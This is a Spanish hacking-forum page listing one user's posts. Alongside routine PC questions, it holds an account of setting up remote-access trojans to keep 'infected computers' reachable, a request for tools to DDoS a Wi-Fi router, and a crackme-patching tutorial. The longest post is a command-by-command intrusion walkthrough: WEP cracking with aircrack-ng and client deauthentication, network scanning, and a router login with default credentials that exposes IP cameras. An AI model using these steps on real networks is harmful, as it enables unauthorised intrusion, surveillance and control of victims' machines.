Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - nightcode

#46
holaaa amigo. bueno espero me ayuden tengo el siguiente problema tengo un nokia lumia 520. con win phone 8.1. baje el facebook. pero al tratar de ingresar al chat no me deja enviar sms para chatiar por facebook. vi algunos videos donde en configuraciones del dispositivo se le permitia enviar sms via facebook. y entrando a la opcion aplicaciones correo y cuentas. hay afiliaba facebook. pero nada de eso me ah funcionado :S como hago ayuda
#47
hola una pregunta. puedo conectarme a una red que tiene cifrado wpa2/psk. sin tener dicha contraseña. pero teniendo en cuenta que tiene el wps activado. y se cual es el codigo WPS (QSS)?  con ese codigo me puedo conectar?
#48
que win es mejor para instalar en una pc que solo tiene 2gb de ram :D?
#49
Windows / pregunta sobre instalacion win7
8 Junio 2018, 19:12 PM
hola a todos pienso formatiar la pc. y instalar win7. pero quisiera saber si obligatoriamente tengo que botearla. o puedo instalarla directamente desde el sistema operativo win que ya tengo. es decir montando la iso con daemon eh instalando como cualquier programa?
#50
Dudas Generales / facebook
8 Junio 2018, 02:32 AM
holaa una pregunta alguien tiene problemas para abrir facebook en google crhome? o les ingresa normal al facebook. y el que tiene los problemas soy solo yop?
#51
hola cual es el mejor antivirus? para un pc con win7?  y que tal es el ESET Smart Security? es recomendable? o no es muy bueno?
#52
esta la pagina caida este ping.?


Haciendo ping a star-z-mini.c10r.facebook.com [157.240.14.39] con 32 bytes de da
tos:
Respuesta desde 157.240.14.39: bytes=32 tiempo=102ms TTL=52
Respuesta desde 157.240.14.39: bytes=32 tiempo=103ms TTL=52
Respuesta desde 157.240.14.39: bytes=32 tiempo=105ms TTL=52
Respuesta desde 157.240.14.39: bytes=32 tiempo=102ms TTL=52

Estadísticas de ping para 157.240.14.39:
    Paquetes: enviados = 4, recibidos = 1, perdidos = 3
    (0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
    Mínimo = 102ms, Máximo = 105ms, Media = 103ms
#53
Hacking / hola me pueden ayudar? con esto
16 Mayo 2018, 22:43 PM
hola mil disculp no se si esto va aqui pero quisiera saber si es posible instalar la version de backtrack 5 en una usb y botearla en win7? como si fuera un disco de arranque de windows? o obligatoriamente hay que instalarlo en maquina virtual?
#54
hola a todos amigos mi pregunta es es posible realizar un ataque de Ddos a una red wifi? o por lo menos un ataque de flujo masivo que inhabilite al router y no le permita acceso a Internet al usuario? si es asi que programa sirve para lograrlo? o como se puede hacer?
#55
Programación General / Ayuda router y troyano.
29 Agosto 2017, 05:31 AM
saludos amigos tengo una pregunta o mejor dicho pregunta con duda jaja xD
estoy intentando configurar troyanos como el prospy rat y el droid jack como todos sabemos para usarlos perfectamente hace falta tener una ip statica que no cambie o varie para no perder las computadora infectadas y el o los troyanos sigan funcionando la cosa esta en que me conecto a una red wifi que esta dominada por un router y la ip es dinámica y cambia constantemente. gracias a dios tengo acceso a las configuraciones del router y en la sección de dhcp del router conseguí una `pequeña ventana que dice (addres ip reservation) en la que me pide la MAC de la pc que se conecta al router y la dirección ip que quiera colocarle a esa pc es decir para que quede fija solo en esa pc cualquier otra pc que se conecte al router y no ese reservada cambiara.. mi pregunta es si hago eso y la pongo fija desde el router funcionara? tal cual como si estuviera colocandola fija con no-ip? o otros programa? para usar los troyanos sin problemas? :silbar: espero su ayuda gracias de antemano :D
#56
hola mil disculpas si me llego a equivocar y este tema no va en este lugar
quisiera saber si alguno a probado o utlizado la herramienta de pentext box? y me puede decir que tan buena es? tambien si conoce algun manual ya que no eh conseguido alguna guia en español para realizar ataques?


gracias de antemano
#57
Hacking / duda sobre telet
5 Abril 2014, 14:39 PM
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Users\Usuario>ipconfig/all
Configuración IP de Windows
  Nombre de host. . . . . . . . . : Usuario-PC
Sufijo DNS principal  . . . . . :
Tipo de nodo. . . . . . . . . . : híbrido
Enrutamiento IP habilitado. . . : no
Proxy WINS habilitado . . . . . : no

Adaptador PPP Digitel:

   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Digitel
   Dirección física. . . . . . . . . . . . . :
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí
    Dirección IPv4. . . . . . . . . . . . . . : 10.227.51.13(Preferido)
Máscara de subred . . . . . . . . . . . . : 255.255.255.255
Puerta de enlace predeterminada . . . . . : 0.0.0.0
Servidores DNS. . . . . . . . . . . . . . : 190.121.224.3
                                     190.121.224.4
NetBIOS sobre TCP/IP. . . . . . . . . . . : deshabilitado                                       190.121.224.4
   NetBIOS sobre TCP/IP. . . . . . . . . . . : deshabilitado

Adaptador de banda ancha móvil Conexión de banda ancha móvil 5:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : HUAWEI Mobile Connect - Network A
dapter #5
   Dirección física. . . . . . . . . . . . . : 58-2C-80-13-92-63
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí

Adaptador de Ethernet Conexión de área local:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Realtek PCIe GBE Family Controlle
r
   Dirección física. . . . . . . . . . . . . : 30-85-A9-48-8B-F8
   DHCP habilitado . . . . . . . . . . . . . : sí
   Configuración automática habilitada . . . : sí

Adaptador de túnel isatap.{3588224F-4AA1-4A96-9FF8-329A694945BF}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Adaptador ISATAP de Microsoft
   Dirección física. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí

Adaptador de túnel isatap.{EFF018C3-EDD7-484D-A977-022141F529C4}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Adaptador ISATAP de Microsoft #2
   Dirección física. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí

Adaptador de túnel Teredo Tunneling Pseudo-Interface:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface

   Dirección física. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí

Adaptador de túnel isatap.{B626256B-7F14-46A9-BA74-DC6A8AAC5C79}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . :
   Descripción . . . . . . . . . . . . . . . : Adaptador ISATAP de Microsoft #3
   Dirección física. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí

C:\Users\Usuario>



Saludos tengo la siguiente inquitetud sucede que quiero realziar una conexión telnet a mi otra computadora. Pero la ip de la maquina a la que me quiero conectar es dinámica quiere decir que cada vez que apague dicha computadora tengo que anotar la ip que sale nueva para poder realizar o iniciar nuevamente la conecion telnet? Otra pregunta cual de estas 2 ip es la que se usa para la conecxxion    Dirección IPv4. . . . . . . . . . . . . . : 10.227.51.13(Preferido) por cierto ya abri el puerto 23 tcp los datos son solo ejemplos puestos por mi
¿
#58
Bueno Con todo el respeto que se merecen los de haya arriba en el Rango Celestial de Moderador Arcángeles Del Foro y Dioses de esta web >.> mi duda es
1) hay alguna manera o algun recuadro que se pueda activar para a la hora de que algún otro usuario responda alguno de mis temas o Citen algunas de mi respuestas se me notifique con algún símbolo mensagito que diga (X usuario a respondido a tu mensage en x tema) o algo para poder mirar que respondieron?? muy parecido a cuando te llega un sms. la verdad con todo respeto me parece muy necesario si no lo hay :S porque es mas fácil para poder ver cuando alguien te responde =( porque si no me toca ojear entre tantos mensajes que dejo aver que respondieron y se me hace un poco engorroso muchas gracias espero nadie se enoje conmigo por esta pregunta es solo curiosidad.

Feliz año nuevo 2014 a todos!
#59
Hacking / Ataque Ddos (Informativo)
31 Diciembre 2013, 21:19 PM

Diagrama de un ataque DDoS usando el software Stacheldraht
En seguridad informática, un ataque de denegación de servicios, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima. Un ejemplo notable de este tipo de ataque se produjo el 27 de marzo de 2013, cuando un ataque de una empresa a otra inundó la red de spam provocando una ralentización generalizada de Internet e incluso llegó a afectar a puntos clave como el nodo central de Londres.1
Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios; por eso se le denomina "denegación", pues hace que el servidor no dé abasto a la cantidad de solicitudes. Esta técnica es usada por los llamados crackers para dejar fuera de servicio a servidores objetivo.
Una ampliación del ataque DoS es el llamado ataque distribuido de denegación de servicio, también llamado ataque DDoS (de las siglas en inglés Distributed Denial of Service) el cual se lleva a cabo generando un gran flujo de información desde varios puntos de conexión. La forma más común de realizar un DDoS es a través de una botnet, siendo esta técnica el ciberataque más usual y eficaz por su sencillez tecnológica.
En ocasiones, esta herramienta ha sido utilizada como un buen método para comprobar la capacidad de tráfico que un ordenador puede soportar sin volverse inestable y afectar a los servicios que presta. Un administrador de redes puede así conocer la capacidad real de cada máquina.
Actualmente el gobierno[¿cuál?] esta planeando penalizar este tipo de ataque para que pase a ser ilegal ya que hay muchas páginas que resultan inaccesibles durante cierto tiempo debido a esta forma de ataque.
Índice 

1 Métodos de ataque
1.1 Inundación SYN (SYN Flood)
1.2 Inundación ICMP (ICMP Flood)
1.3 SMURF
1.4 Inundación UDP (UDP Flood)
2 Véase también
3 Referencias
4 Enlaces externos

Métodos de ataque


Un ataque de "Denegación de servicio" impide el uso legítimo de los usuarios al usar un servicio de red. El ataque se puede dar de muchas formas. Pero todas tienen algo en común: utilizan la familia de protocolos TCP/IP para conseguir su propósito.
Un ataque DoS puede ser perpetrado de varias formas. Aunque básicamente consisten en :
Consumo de recursos computacionales, tales como ancho de banda, espacio de disco, o tiempo de procesador.
Alteración de información de configuración, tales como información de rutas de encaminamiento.
Alteración de información de estado, tales como interrupción de sesiones TCP (TCP reset).
Interrupción de componentes físicos de red.
Obstrucción de medios de comunicación entre usuarios de un servicio y la víctima, de manera que ya no puedan comunicarse adecuadamente.
Inundación SYN (SYN Flood)

Principios de TCP/IP
Cuando una máquina se comunica mediante TCP/IP con otra, envía una serie de datos junto a la petición real. Estos datos forman la cabecera de la solicitud. Dentro de la cabecera se encuentran unas señalizaciones llamadas Flags (banderas). Estas señalizaciones (banderas) permiten iniciar una conexión, cerrarla, indicar que una solicitud es urgente, reiniciar una conexión, etc. Las banderas se incluyen tanto en la solicitud (cliente), como en la respuesta (servidor).
Para aclararlo, veamos cómo es un intercambio estándar TCP/IP:
1 Establecer Conexión: El cliente envía una Flag SYN; si el servidor acepta la conexión, éste debería responderle con un SYN/ACK; luego el cliente debería responder con una Flag ACK.
1-Cliente --------SYN----->  2 Servidor
4-Cliente <-----SYN/ACK----  3 Servidor
5-Cliente --------ACK----->  6 Servidor

2 Resetear Conexión: Al haber algún error o perdida de paquetes de envío se establece envío de Flags RST:
1-Cliente -------Reset-----> 2-servidor
4-Cliente <----Reset/ACK---- 3-Servidor
5-Cliente --------ACK------> 6-Servidor

La inundación SYN envía un flujo de paquetes TCP/SYN (varias peticiones con Flags SYN en la cabecera), muchas veces con la dirección de origen falsificada. Cada uno de los paquetes recibidos es tratado por el destino como una petición de conexión, causando que el servidor intente establecer una conexión al responder con un paquete TCP/SYN-ACK y esperando el paquete de respuesta TCP/ACK (Parte del proceso de establecimiento de conexión TCP de 3 vías). Sin embargo, debido a que la dirección de origen es falsa o la dirección IP real no ha solicitado la conexión, nunca llega la respuesta.
Estos intentos de conexión consumen recursos en el servidor y copan el número de conexiones que se pueden establecer, reduciendo la disponibilidad del servidor para responder peticiones legítimas de conexión.
SYN cookies provee un mecanismo de protección contra Inundación SYN, eliminando la reserva de recursos en el host destino, para una conexión en momento de su gestión inicial.
Inundación ICMP (ICMP Flood)

Artículo principal: Nuke
Es una técnica DoS que pretende agotar el ancho de banda de la víctima. Consiste en enviar de forma continuada un número elevado de paquetes ICMP Echo request (ping) de tamaño considerable a la víctima, de forma que esta ha de responder con paquetes ICMP Echo reply (pong) lo que supone una sobrecarga tanto en la red como en el sistema de la víctima.

Dependiendo de la relación entre capacidad de procesamiento de la víctima y el atacante, el grado de sobrecarga varía, es decir, si un atacante tiene una capacidad mucho mayor, la víctima no puede manejar el tráfico generado.
SMURF

Artículo principal: Ataque smurf
Existe una variante a ICMP Flood denominado Ataque Smurf que amplifica considerablemente los efectos de un ataque ICMP.
Existen tres partes en un Ataque Smurf: El atacante, el intermediario y la víctima (comprobaremos que el intermediario también puede ser víctima).
En el ataque Smurf, el atacante dirige paquetes ICMP tipo "echo request" (ping) a una dirección IP de broadcast, usando como dirección IP origen, la dirección de la víctima (Spoofing). Se espera que los equipos conectados respondan a la petición, usando Echo reply, a la máquina origen (víctima).
Se dice que el efecto es amplificado, debido a que la cantidad de respuestas obtenidas, corresponde a la cantidad de equipos en la red que puedan responder. Todas estas respuestas son dirigidas a la víctima intentando colapsar sus recursos de red.
Como se dijo anteriormente, los intermediarios también sufren los mismos problemas que las propias víctimas.

Inundación UDP (UDP Flood)

Básicamente este ataque consiste en generar grandes cantidades de paquetes UDP contra la víctima elegida. Debido a la naturaleza sin conexión del protocolo UDP, este tipo de ataques suele venir acompañado de IP spoofing.
Es usual dirigir este ataque contra máquinas que ejecutan el servicio Echo, de forma que se generan mensajes Echo de un elevado tamaño.

Nightcode :O
#60
Foro Libre / Al estilo informatico :)
31 Diciembre 2013, 21:15 PM
espero no esta equivocado y si no mueven el post por favor solo quise dejar algunos poemitas informaticos para tu novia

Eres el kernel de mi linux.

Eres el html de mi corazon.com.
Eres 1024kb para mi megabyte.
Tus ojos brillan mas que mi torre de cds.
Tucorazon.com esta en mi pagina de inicio.
Eres el socket de mi CPU.
Tu RAM le da vida a mi SO.

- Eres el compilador de mi codigo.

El .gif que anima mi vida.
Siempre estas en C:/Mi/Corazon.
Te pienso mas que las paginas indexadas por google.
Eres como el firefox que me saco del infiero explorer.
Eres el enter de mi vida.
Si me dejas hago Alt-F4 a mi vida.

- Cuando te veo mi ciclo de CPU se acelera.

Tu tienes la maxima prioridad en mi lista de procesos.
Eres el linkador de mis objetos.
Tus deseos son signals para mi.
Ninguna grafica podria renderizar al 100% tu perfecta figura.
En la cama eres puro overclocking.
Sin ti mi vida seria como una web sin CSS.
Eres el cargador de mi iPod.

- Eres la primera en Google al buscar mi corazon.

Tienes permisos de root en mi vida.
Tus palabras tienen el IRQ mas bajo para mi.
Juntos somos como un procesador de doble nucleo.
Tengo el feed RSS de tus pensamientos.
Mi sistema operativo entra en hibernacion cuando no estas a mi lado.
Quisiera ser un Pendrive para tus USB.
Contigo no necesito tirar de Swap.
Nuestros corazones sincronizan por Wifi.
Y tu eres la unica que puede romper mi WPA

Teniendo mi WPA tienes y eres la dueña de mi corazon

Mi amor ..XD
Eres los Pixeles de Mi vida

About these ads
Comparte ésta entrada:
;-)
#61
Programación General / O.O sabes lo que es?
31 Diciembre 2013, 20:50 PM
Veamos si sabéis que es esto:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[10];
  if (argc < 2)
  {
    fprintf(stderr, "MODO DE USO: %s string\n", argv[0]);
    return 1;
  }
  strcpy(buffer, argv[1]);
  return 0;
}

y si deseas puedes decir como lo resolverías si no. se publicara mañana la respuesta
#62
Hola a todos, este  post va a tratar sobre Crackeo básico de un programa, lo que definimos como ingeniería inversa, se que este tema está más que trillado, pero creo que todo lo que sea distintos puntos de vista son buenos, Bien comenzemos.

Lo que vamos a crackear en este post es una crackme, el cual para todo aquel que desee practicar pueda hacerlo siguiendo los mismos pasos, aquí  podeis bajaros el crackme:

https://skydrive.live.com/#cid=1A68731A91386F4B&id=1A68731A91386F4B!114

Bien,  para hacer este tipo de crackeo hay varios tipos de programas, como por ejemplo:  OLLYDBG, W32DSM, INMMUNITY DEBUGGER, yo particularmente voy a hacerlo con el último, ya que el que más me gusta, pero debeis de saber que en el caso de OLLYDBG, el proceso es el mismo, bien, una vez ya tenemos nuestro programa para debuggear(desensamblar) y nuestro crackme (programa para crackear) comenzamos con  la operación.

-Lo 1º que haremos será abrir el programa que vamos a crackear  y una vez nos pide el serial para activarlo ponemos lo que queramos, en este caso yo he puesto 123456 y le damos a entrar o chequear, ver imagen:



-Una vez introducido el serial o la clave errónea, nos advertirá con una ventanita en la cual nos dará el mensaje de error diciéndonos que ese no es el serial, lo que hacemos será copiar el mensaje que esa ventanita nos dé, ver imagen:



Como podemos observar, el mensaje que este nos da es: key is wrong, bien una vez tenemos ya el mensaje copiado procederemos a abrir nuestro debuggeador y una vez abierto vamos a la pestaña file o archivo y seleccionamos abrir u open y seleccionamos el programa que vamos a  crackear, que en mi caso es el crackme, ver imágenes:






Ahora nuestro debugger automáticamente nos abrirá  y desensamblara nuestro crackme o programa, bien una vez hecho esto, haremos click derecho y se nos abrirá una ventana, ahí haremos click sobre serach for y posteriormente sobre all referenced text strings,  con esto último se nos abrirán todas las referencias de las cadenas de texto que contiene nuestro programa o crackme, ver imagen:



Bien, una vez hecho esto, lo que hacemos es buscar en el debugger el mensaje de error que anteriormente nos dio el  crackme, que era key is wrong y una vez localizado hacemos un doble click sobre el, ver imagen:




Bien, una vez  hecho el doble click sobre el,  lo que hacemos será buscar el mensaje que nos de paso, el ok al programa y una vez localizado, que en este caso es key is ok lo que haremos será copiar el nº que figura a la izquierda del todo, ver imagen:
+


Una vez localizado el número lo que haremos será buscar el mesaje anterior de error y haremos un  doble click sobre la zona donde pone push seguido de crackme1 y un numero y automáticamente se nos abrirá una ventana en la que deberemos introducir lo siguiente:

JMP SHORT 0041660

Y pulsamos sobre la pestaña assemble, de este modo lo que estamos haciendo es crear un salto, desde el  mensaje de error(key  is worng) hasta el mensaje del ok (key is ok) para que lo entendamos, con la orden JMP SHORT lo que le estamos diciendo al programa es que cuando llegue al mensaje de error, salte directamente al ok, de esta forma creamos el salto, ver imagen:



Como podemos observar ya se ha creado el salto, así que cada vez que ejecutemos nuestro programa, se saltará la restricción ver imagen:



Hasta aquí todo bien, pero ahora para que este efecto quede permanente hay que proceder a guardarlo y para poder guardar los cambios haremos click derecho y se nos abrirá una ventana, en ella seleccionamos donde pone copy to executable y posteriormente en donde pone selection, ver imagen:



Una vez hecho esto veremos como se nos cambia y se nos desorganiza todas las ventanas dentro del debugger,pues bien, esto es normal no os asusteis jajaja,  ahora lo que haremos será situarnos encima la primera ventana y haremos un click derecho  y seleccionaremos save file  y después solo nos queda decirle donde queremos que nos guarde el programa (aconsejado guardarlo en el mismo lugar donde estaba para que funcione :) ver imágenes:





Pues ahora solo queda probarlo, así que lo que haremos será abrir nuestro crackme o programa ya crackeado y una vez nos pida el serial o la clave, ponemos lo que nos dé la gana, que en mi caso es 123456 y le damos a entrar, podemos ver en la imagen que el crackem en este caso ya está crackeado, ver imagen:



Bien chic@s, pues esta es la base para crackear un programa, evidentemente, los hay mucho más complicado, pero con esta entrada solo pretendo iniciar el 1º de la serie en la que iremos avanzando poco a poco, próximamente también se irán poniendo retos basado en los post de ingeniería inversa que voy posteando para que practiquéis, repito esto es la base, espero que os haya gustado y hasta el proximo. Se despide Nightcode
#63
HOla gente de foro hacker

mostraros como crackear una contraseña que esté en MD5. (Esto solo serà posible si la contraseña está en alguna de las bases de datos consultadas en este script)

Lo 1º será descargarnos el archivo, aquí teneis el enlace: http://www.mediafire.com/?25tv01mw46vgs23

Ahora procederemos a ejecutarlo desde el directorio donde lo tengamos guardado, en mi caso está en el escritorio.

Sería así: perl md5BTshell.pl 5d3d327c8ca6ac4118fda3b47b5c00aa  ver imagen:



Bien una vez hecho esto le damos a enter y el programa empezara a trabajar como
podemos observar en la siguiente imagen.



Como podemos ver ya la ha crackeado, también deciros que el codigo es libre, por lo que con un
poco de ingénio podemos ir añadiendo más crackeadores online, de esa forma habrá más posibilidades de descifrarla.

esta es la lista de crackeadores que hay en el codigo.pl

Código: [Seleccionar]
md5decrypter.com
md5.thekaine.de
nz.md5.crysm.n
tydal.nu
milw0rm.com
gdataonline.com
csthis.com
md5pass.info
md5.hashcracking.com
md5decryption.com
md5.xpzone.de
us.md5.crysm.net
hashreverse.com
neeao.com
hashchecker.com
plain-text.info
victorov.su
securitystats.com
md5crack.it-helpnet

espero les haya gustado Att: Nightcode
#64
Hacking / COrriendo un ataque :O
31 Diciembre 2013, 00:08 AM
:D espero les guste Att Nightcode:

ENTRANDO EN LA RED

Sabemos que la red LAN que queremos atacar dispone de un router Wi-Fi con ESSID: WLAN_BE.
Este es el único dato que tenemos por ahora, por lo que centramos nuestro ataque en el AP de la red Wi-Fi con el objetivo de autentificarnos como clientes legítimos de la red.

Corremos Backtrack.

Comenzamos con un monitoreo general de las redes a nuestro alcance para localizar nuestro objetivo. Descubrimos que el AP está emitiendo en el canal 6 y que su dirección MAC es E0:90:53:4A:68:AA. Además averiguamos que la contraseña tiene una cifrado WEP.

airodump-ng wlan0

Monitoreamos el tráfico de la red para capturar IVs que nos permitan crackear la pass con aircrack-ng.

airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0

Hacemos un ataque de falsa autenticación y nos asociamos con el AP para poder inyectar tráfico.

aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0

Comenzamos a analizar paquetes buscando aquellos que contengan una petición de ARP para poder reinyectarlos. Al reinyectarlos provocamos que el AP tenga que emitir otro paquete ARP con un IV nuevo que capturamos con el airodump-ng. Este proceso es un bucle que se repite generando muchisimo tráfico.

aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0

Como no encontramos ningún paquete de ARP que reinyectar, lanzamos un ataque de desautenticación a un cliente legítimo para que al volver a autenticarse genere una petición de ARP que podamos capturar y reinyectar.

aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0

Crackeamos el password de la red mediante los IVs obtenidos que hemos guardado en el wlan_be.cap.

aircrack-ng wlan_be.cap

Ya tenemos el password de la red: XE091534A27BE
Nos conectamos a ella como si fuéramos uno más.

TANTEANDO EL TERRENO

Una vez que estamos dentro de la red, hacemos un "reconocimiento del terreno" para saber ante que nos encontramos. Para ello vamos a realizar un escaneo con el Nmap.

Primero ejecutamos el comando:

ifconfig

Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, y así poder deducir en que rango de IPs nos estamos moviendo. Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemos que seguramente el servidor DHCP asigne las IPs dentro del rango 192.168.1.1-255.

Para confirmarlo y hacernos una idea general del mapa de la LAN realizamos un escaneo rápido con Nmap.

nmap -sP 192.168.1.1-255

La opción -sP le indica al Nmap que simplemente compruebe si los hosts estan up or down.

Resultado:

root@bt:~# nmap -sP 192.168.1.1-255

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Nmap scan report for 192.168.1.10
Host is up (0.033s latency).
MAC Address: 00:1B:11:01:30:95 (D-Link)
Nmap scan report for 192.168.1.13
Host is up (0.0060s latency).
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Nmap scan report for 192.168.1.14
Host is up (0.071s latency).
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Nmap scan report for 192.168.1.15
Host is up (0.54s latency).
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Nmap scan report for 192.168.1.16
Host is up (0.17s latency).
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Nmap scan report for 192.168.1.17
Host is up (0.17s latency).
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Nmap scan report for 192.168.1.18
Host is up (0.092s latency).
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Nmap scan report for 192.168.1.19
Host is up (0.32s latency).
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Nmap scan report for 192.168.1.20
Host is up (0.53s latency).
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Nmap scan report for 192.168.1.33
Host is up (0.0037s latency).
MAC Address: 00:26:24:75:5B:6F (Thomson)
Nmap scan report for 192.168.1.34
Host is up (0.0032s latency).
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Nmap scan report for 192.168.1.36
Host is up (0.0079s latency).
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Nmap scan report for 192.168.1.38
Host is up (0.25s latency).
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds

Descubrimos que hay 15 máquinas conectadas mediante la WLAN y confirmamos nuestras sospechas de que el servidor DHCP asigna IPs en el rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa más o menos aproximado de la red.

La ip 192.168.1.1 corresponde seguramente al AP, osea al router, que parece ser un Xavii.
Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatos D-Link lo que es bastante llamativo.
Vemos otras IPs correspondientes a varios hosts.
Y por último vemos nuestra IP 192.168.1.129 que la descartamos del análisis.

Una vez que tenemos más o menos claro por donde nos movemos... vamos a ver que pasa con ese router.

EL ROUTER

En el escaneo anterior hemos visto que la IP del router era 192.168.1.1 .Esta vez vamos a realizar un escaneo más a fondo, buscando puerto abiertos, servicios, S.O... Para ello corremos el Nmap con los siguientes parámetros:

root@bt:~# nmap -sV -A 192.168.1.1

Nmap scan report for 192.168.1.1
Host is up (0.0065s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Xavi 7768 WAP ftpd 1.00
23/tcp   open  telnet     Zoom X6 ADSL router telnetd
53/tcp   open  tcpwrapped
80/tcp   open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
2800/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
8008/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router

TRACEROUTE
HOP RTT     ADDRESS
1   6.45 ms 192.168.1.1

Vemos que entre otras cosas en el campo del ftp el nmap nos dice que se trata del modelo Xavii 7768. Esto es una aproximación y seguramente no sea totalmente cierto, pero nos sirve.
Buscamos la documentación del router Xavii 7768 en internet http://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html y vemos que el usuario y el password por defecto del router son 1234 y 1234 respectivamente. Es muy probable que no los hayan cambiado así que por probar que no quede.

Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejado la puerta abierta.



Comprobamos que como habíamos supuesto antes no se trata del modelo Xavii 7768, sino del 7968 plus.
Y de repente en la pestaña de redireccionamiento de puertos...



BANG! Acabamos de descubrir que eran todos esos aparatos D-Link. Tenemos 9 cámaras con sus correspondientes IPs. Esto empieza a ponerse interesante...
Además sabemos que alguien se conecta a ellas desde el exterior de la red, ya que no tendría sentido haber configurado un NAT si no vas a acceder desde fuera del router.

Personalmente ODIO las interfaces http de los routers, me parece todo una maraña de opciones y pestañas, así que vamos a conectarnos al router por telnet para tener una consola con todas las opciones ordenaditas en blanco sobre negro... ::) :D

root@bt:~# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

                ,vvvdP9P???^   ,,,
              vvd###P^`^         vvvvv v
         vv#####?^                  ????####vv,
      vv####??     ,vvvdP???^  ,,,        ??##^
     v#####?    ,vvd##P?^        #?#v#vvv
   v#####?    v###P^    ,vvv,        '?#?,
  ######?   ####?^ ,vd#P?^     `???##
  #####?   v####  ,d##P^           ''
######   v####  ]###L                   _   _          _                  ___
#####?   v####  ]##L                   /   / \  |\ |  |_  \/   /\   |\ |   |
######    ####  ]###L                  \_  \_/  | \|  |_  /\  /--\  | \|   |
?#####v   ####v  ]##h,            ,,
  ?#####    ?###h,  `9#hv,     ,vv###
    ######    #####L    ]###L        ,v#v'
    ?#####vv    ?9##hv,        ,,vvvv###'
       ?#####vv     `??9P\vv,   ^         vv##,
          ######                       #######L
            ??###hvv,          ,vvv#?##?????
                `????9hdhvv,

Login: 1234
Password: ****

Login successful

-->
802.1x           802.1x port based authentication
acl              snmp remote management
agent            Get a file from a remote host
ald              Configuration commands for ald
bridge           Configure layer 2 bridge
classifier       Packet classifier configuration commands
console          Console access
dhcpclient       DHCP client configuration commands
dhcpserver       DHCP server configuration commands
dnsclient        DNS client configuration commands
dnsrelay         DNS relay configuration
emux             Ethernet Switch Multiplex configuration commands
ethernet         Commands to configure ethernet transports
firewall         Firewall configuration commands
fullConeNat      Full Cone NAT configuration commands
